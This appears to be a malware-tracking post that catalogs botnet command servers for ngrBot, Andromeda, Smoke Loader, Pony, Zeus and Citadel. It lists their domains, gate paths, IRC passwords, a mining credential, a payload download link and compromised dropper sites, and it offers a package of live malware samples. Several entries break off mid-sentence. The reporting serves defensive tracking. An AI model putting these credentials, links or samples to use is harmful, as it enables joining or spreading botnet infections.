f0001.info/f0010.info/thismynew1.info(ngrBot hosted by Czech Republic Zlin Fdcservers.net)

Resolved : [f0001.info] To [] Resolved : [f0010.info] To [] Resolved : [thismynew1.info] To [] mom002.net not active now Server: Server Password: Username: jhdkutg Nickname: n{DE|XPa}jhdkutg Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s Download URLs hxxp:// (api.wipmania.com) hxxp:// (hotfile.com) hxxp:// (s251.hotfile.com) hxxp:// (hotfile.com) hxxp:// (s251.hotfile.com) hosting infos:http://whois.domaintools.com/

www.yahgodz.com (Andromeda http botnet hosted by dataclub.biz)

Resolved www.yahgodz.com to Server:  www.yahgodz.com Gate file:  /http/image.php Additional domains: bighecks.net/http/image.php (Missing gate file, hosted at worldstream.nl sonic4us.ru/http/image.php (Pointed at imageshells.com/admin/image.php (Missing gate file, hosted at worldstream.nl All of these are mystical’s domains, used for various nefarious purposes in the past. A quick google shows that he’s been loading onto this

privategallerie.info (Andromeda http botnet hosted by vmbox.co)

Resolved privategallerie.info to Server:  privategallerie.info Gate file:   /admin/hippo/image.php Bitcoin mining info:  http://pr3m1era_quio:mota@eu.triplemining.com:8344 A previously posted andromeda botnet had a similar folder path to the gate file.  Hosting infos: http://whois.domaintools.com/

aeonhf.net (Smoke loader http botnet proxied by cloudflare)

Resolved aeonhf.net to, (Cloudflare ips) Server:  aeonhf.net, Alternate domain:  aminserve.info (Currently has non-responsive nameservers) Gate file:  /admin/index.php This is the latest skid who uses cloudflare to help host his botnet. Maybe this time they’ll do something about it? Hosting infos: ecatel.info Edit: CloudFlare received your abuse report dated February 24, 2013 regarding: aeonhf.net

mikimouse.net (ngrbot irc botnet hosted by yisp.nl)

Resolved mikimouse.net to Server:  mikimouse.net (Alternate domains mikimouse.org mikispace.org) Port:  1863 Server password:  jobs Channel:  #jobs Topic for #jobs is: Topic for #jobs set by h at Sat Feb 23 19:28:30 2013 This is the same bot, port and spreading method as a previously posted botnet. However that had been sinkholed so it appears

616design.info (Pony loader and Zeus banking malware hosted by fastit.net)

Resolved 616design.info to Pony Server:  616design.info Gate file:  /forum/pony/gate.php This is by the same guy as this winlocker and andromeda bot. The server seems to be down at the moment, most likely due to zeus tracker posting the zeus bot I located on the same ip. Zeus Server:  oppspeedy.co.ua Gate file:  /forum/33/gate.php Config file: 

tommyslav.name (Ginemo winlocker hosted by justhost.in.ua)

Resolved tommyslav.name to I saw Malekal tweet that someone was using an exploit kit on adf.ly to distribute andromeda. I had already posted the andromeda, and had suspected that it was the cracked version. I just entered the gate info into the builder, ran the build and watched it download this. Server:  tommyslav.name Gate (Citadel banking malware hosted by balticservers.com)

Gate file: Config droppers  (appear to be compromised sites) shadowsfromlight.com/wp-content/upgrade/file.php www.danainvestment.com/wp-content/upgrade/file.php gregsmission.org/wp-content/upgrade/file.php luna.pgnstudio.com/wp-content/upgrade/file.php On gregsmission.org WP-Sentinel seems to have failed to stop the initial compromise, but is now preventing the dropper from functioning. Sample is located here http://whois.domaintools.com/

92mb samples for analysis

This package have alot of irc bots samples banking trojans linux bots samples are provided only for analysis purposes dont run them on your machine use vmware Source Source